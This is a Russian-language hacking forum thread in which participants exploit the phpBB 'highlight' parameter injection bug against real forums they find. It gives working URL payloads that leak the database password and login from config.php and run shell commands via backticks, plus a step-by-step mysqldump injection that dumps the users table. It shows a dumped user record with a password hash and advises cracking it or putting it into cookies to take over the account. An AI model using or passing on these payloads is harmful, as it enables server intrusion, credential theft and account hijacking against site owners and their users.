Наткнулся на один форум, там &highlight=%2527.$poster=$dbpasswd.%2527 - бага канает, выводится пасс для бд, так же и логин, но больше ни одна бага не работает, если ковырнуть на &highlight=%2527.$poster=%60$ls%60.%2527&ls= id;uname%20-a; - выводится )b#i и всё ни одна из команд не работает, врятли багу там прикрыли, кто нить с этим сталкивался???
Вроде бы... там так написано типа... потому что закрывать эту всю муть должны вроде б ы символы %2527, нЭ?
Дык ясный день, дело в том что ни одна из команд не работает, типа cd..;pwd;ls -l - думаю понятно что это, в том то и беда, что не работают они, где-то я читал мол значит сервак не под линухом, но каким макаром тогда берётся инфа из config.php с помощью &highlight=%2527.$poster=$dbpasswd.%2527 ???
Скорее всего,выключен register globals. Попробуй вот так: p=123&highlight=%2527.$poster=%60ls%09-la%60.%2527 Вместо пробела %09 Дамп базы: p=123&highlight=%2527.$poster=%60/путь/mysqldump%09-uИмяЮзераБазы%09-pПарольБазы%09ИмяБазы%09префикс_users%09>%09db.sql%60.%2527 ИмяЮзераБазы:$poster=$dbuser ПарольБазы:$poster=$dbpasswd ИмяБазы:$poster=$dbname Префикс:$poster=$table_prefix(обычно phpbb_)
X-Seven, а /путь/ чего указывать? Покажи пример... uИмяЮзераБазы%09- А зачем эта чёрточка в конце? Вообщем только что проверил - не работает дамп базы.
Вот так типа по этой схеме надо делать: mysqldump --opt -uLOGIN -pPASS DBNAME > dump.sql LOGIN=dbuser PASS=dbpasswd DBNAME=dbname
Ты прав, register globals выключен, но беда какая-то получается, ставлю вместо пробела - %09 но эфект тот же, зато весь конфиг.пхп вылажен, странно как-то получается =/ Да и если не трудно, то расскажи про путь к дампу.
Насчёт дампа базы. Mysql-база дампится запросами вида: mysqldump -u -p dbname > file После -u должнен идти dbuser,например -uadmin, после -p dbpasswd,например -ppass, с dbname,надеюсь,всё ясно.Но т.к. целиком база не нужна, то нужно ещё указать конкретную её часть,а именно,phpbb_users. (примечание:название может быть другое,например forum_users,как узнать префикс,читай выше). Вместо > лучше писать %3E file-имя файла,куда должна сдампиться база(теоритически).У меня phpbb_users просто вывелось на страницу. ВНИМАНИЕ:В запросе важно указать ПОЛНЫЙ ПУТЬ К МУСКУЛЮ,а точнее, к файлу mysqldump(путь надо предварительно разведать командами типа ls или cd).Например,пути могут быть такими: /usr/local/mysql/bin/mysqldump /usr/local/bin/mysqldump /usr/bin/mysqldump Пример: Если dbuser=root,dbpasswd=qwerty,dbname=baza,prefix=phpbb_, mysqldump лежит в /usr/bin/,запрос будет таким: p=123&highlight=%2527.$poster=%60/usr/bin/mysqldump%09-uroot%09-pqwerty%09baza%09phpbb_users%09%3E%09file.sql%60.%2527 Примечание:вместо всех пробелов надо писать %09,если темы P=123 не существует,то надо изменить номер,например,на p=321,при копировании строки запроса в браузер,могут появиться пробелы из-за переноса строки, их надо удалить. Если всё прошло удачно,то появится что-то типо этого: - MySQL dump 8.23 -- -- Host: localhost Database: baze --------------------------------------------------------- -- Server version 3.23.58 -- -- Table structure for table `forum_users`..... Интерес представляют хэши паролей: INSERT INTO forum_users VALUES (14,1,'Зелёная','fae0b27c451c728867a567e8c1bb4e53',1097589801,0,1097589801,1097589772,0,0,0.00,1,'russian','D M d, Y g:i a',0,0,0,NULL,1,1,0,1,1,1,1,1,0,1,1,0,'',0,'[email protected]','','','Иркутск','','','','','','','','',NULL); В данном случае Зелёная-логин,[email protected]мыло,на которое логин регился, fae0b27c451c728867a567e8c1bb4e53 -MD5-хэш,что бы его сломать,надо юзать прогу MD5Inside. Примечание:хэш можно подставить в куки вместо своего. Enjoy!
"We have 63383 registered users Fatal error: Allowed memory size of 39797528 bytes exhausted (tried to allocate 18352939 bytes) in .../forum/viewtopic.php(1107) : regexp code on line 1 " Как бороться?
Ну вот что у меня появилось за место nickname у чела вылезло -- MySQL dump 9.10 -- -- Host: localhost Database: pbb -- ------------------------------------------------------ -- Server version 4.0.18 )\b#i Всё больше никучего нету. Подскажите что я не так сделал?
Аналогично у меня было, когда пытался ограничить кол-во выводимых записей параметром -w 'user-level=1'. В чем проблема?
У меня аналогичное выскакивало когда я неправильно указал префикс(вместо стандартного phpbb_users надо было forum_users) Путь к мускулю указан правильный. Скорее всего,ты где-то ошибся при вводе данных(если dbuser,dbpasswd,dbname и table_prefix указаны верно,то база должна сдампиться). Ещё в строчку могли попасться лишние пробелы.